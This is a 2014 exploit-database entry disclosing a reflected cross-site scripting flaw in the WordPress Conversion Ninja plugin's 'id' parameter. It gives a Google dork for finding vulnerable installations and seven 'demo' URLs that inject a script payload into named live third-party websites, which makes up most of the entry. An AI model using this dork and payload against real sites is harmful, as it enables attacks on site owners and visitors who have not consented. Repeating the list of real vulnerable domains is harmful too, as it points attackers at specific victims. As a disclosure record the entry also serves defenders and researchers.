WordPress Conversion Ninja Cross Site Scripting Vulnerability

2014-05-25T00:00:00
ID 1337DAY-ID-22282
Type zdt
Reporter Ashiyane
Modified 2014-05-25T00:00:00

Description

WordPress Conversion Ninja plugin suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.

                                        
                                            [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title: Wordpress Plugin Conversionninja Cross Site Scripting
[+]
[+] Exploit Author: Ashiyane Digital Security Team
[+]
[+] Date: 2014-05-22
[+]
[+] Google Dork : inurl:wp-content/plugins/conversionninja
[+]
[+] Vendor Homepage : http://www.Wordpress.org
[+]
[+] Tested on: Windows 7 , Mozilla FireFox
[+]
[+] Discovered By : Milad Hacking
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+]  Location :
[localhost]/wp-content/plugins/conversionninja/lp/index.php?id=[XSS]

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Demo :

http://mlm18.de/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E

http://www.digitaler-kabelanschluss.com/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E

http://www.schwarzer-adler-feucht.de/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E

http://bestvertrieb.com/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E

http://gratis-webinare.eu/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E

http://www.salsa-online-academy.com/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E

http://dasleadsystem.eu/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E


[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Discovered By : Milad Hacking

We Love Mohammad

Mail : [email protected]

Home Page : https://www.facebook.com/milad.hacking.5

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

#  0day.today [2018-01-26]  #